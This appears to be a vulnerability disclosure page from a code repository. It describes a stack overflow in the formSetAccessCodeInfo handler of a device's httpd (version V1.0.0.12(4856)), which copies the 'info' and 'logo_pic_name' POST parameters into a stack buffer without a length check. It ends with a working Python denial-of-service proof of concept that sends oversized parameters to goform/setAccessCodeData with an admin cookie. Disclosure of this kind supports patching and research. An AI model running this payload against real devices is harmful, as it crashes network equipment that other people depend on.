Skip to content

Latest commit

 

History

History

formSetAccessCodeInfo

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Overview

Affected version

V1.0.0.12(4856)

Vulnerability details

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formSetAccessCodeInfo function, which can be accessed via the URL goform/setAccessCodeData

image-20220527170409741

formSetAccessCodeInfo function gets the POST parameter info and logo_pic_nameand copies to stack buffer without checking its length, causing a stack overflow vulnerability.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"info": b'A'*0x400,
    b"logo_pic_name": b'A'*0x400
}
cookies = {
    b"user": "admin"
}
res = requests.post("http://127.0.0.1/goform/setAccessCodeData", data=data, cookies=cookies)
print(res.content)